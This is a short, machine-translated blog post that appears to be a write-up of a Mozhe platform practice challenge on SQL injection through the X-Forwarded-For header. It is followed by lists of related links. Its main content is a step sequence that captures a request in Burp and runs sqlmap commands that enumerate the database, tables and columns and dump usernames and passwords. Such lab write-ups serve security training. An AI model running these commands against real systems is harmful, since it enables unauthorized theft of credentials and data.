X-forwarded-for injection vulnerability combat - Code World

X-forwarded-for injection vulnerability combat

Others 2019-10-21 09:48:38 views: null

1, grasp the basic principles of SQL injection;
2, understand the server to obtain client IP way;
3, to understand SQL injection tools;

Just enter a user name password, suggesting ip information, the information is made based on x-forwarded-for paper based on the meaning of the title, so this problem exists x-forwarded-for injection
1. First open burp capture, add x- forwarded-for: *, raw information is saved as txt file, as shown below, FIG slower, wait

2：#sqlmap -r 1.txt --current-db --batch    //爆出数据库
3：#sqlmap -r 1.txt -D webcalendar --tables  //爆出表
4：#sqlmap -r 1.txt -D webcalendar -T user --columns //爆出列
5：#sqlmap -r 1.txt -D webcalendar -T user -C username,password --dump //爆出数据库用户名和密码


这是墨者平台的一道注入题

Guess you like

Origin www.cnblogs.com/gusi/p/11711456.html

X-forwarded-for injection vulnerability combat

Mozi - X-FORWARDED-FOR injection vulnerability combat

X-Forwarded-For injection vulnerability actual recording process

[Summary] Vulnerability SQL Injection Vulnerability

Actual Combat - Changjie CRM get_usedspace.php SQL Injection Vulnerability

CRLF injection vulnerability

SQL injection and xss vulnerability

Command injection vulnerability

Command injection vulnerability (2)

External entity injection vulnerability

Command injection vulnerability (1)

Command injection vulnerability in DVWA

SSI vulnerability injection

Payment module injection vulnerability

(SQL) Injection Vulnerability Fix

JNDI injection vulnerability

SQL injection vulnerability attack

phpwind9.x and 8.7XSS injection and management background script injection vulnerability

Client IP pit of X-Forwarded-For

A shop background sql injection vulnerability

Brief description of SQL injection vulnerability

SQL Boolean blind injection vulnerability

Write the poc of the injection vulnerability in python

Smart Contract Call Injection Vulnerability

TopN Vulnerability--sql Injection

YxtCMF SQL injection vulnerability reappears

[Vulnerability Analysis] Discuz! X Series full version of SQL injection vulnerabilities background

The difference between X-Forwarded-For and the X-Real-ip

SQL injection combat —— 1. MySQL manual injection combat

SQL injection combat —— 1. MySQL manual injection combat

Recommended

Ranking

ElasticSearch-- data modeling best practices

Permission Maintenance - Shadow User Backdoor

Refactor the code using MVP mode

Quantitative investment-fundamental model-PVC multi-factor model

Spark Big Data Processing Lecture Notes 3.2 Mastering RDD Operators

Blazor page components (2)

Erlernen von Kenntnissen zur Android-Entwicklung – Kodierung, Verschlüsselung, Hash, Serialisierung und Zeichensätze

About Qi high in JAVA study notes SORM summary detailed personal explanation

Will you calculate the accuracy of the rope displacement sensor in the measurement?

OPENJTAG debugging learning (3): debugging using the gdb command line

Daily

More

2024-05-01(4)

2024-04-30(36)

2024-04-29(5)

2024-04-28(12)

2024-04-27(29)

2024-04-26(22)

2024-04-25(32)

2024-04-24(30)

2024-04-23(30)

2024-04-22(5)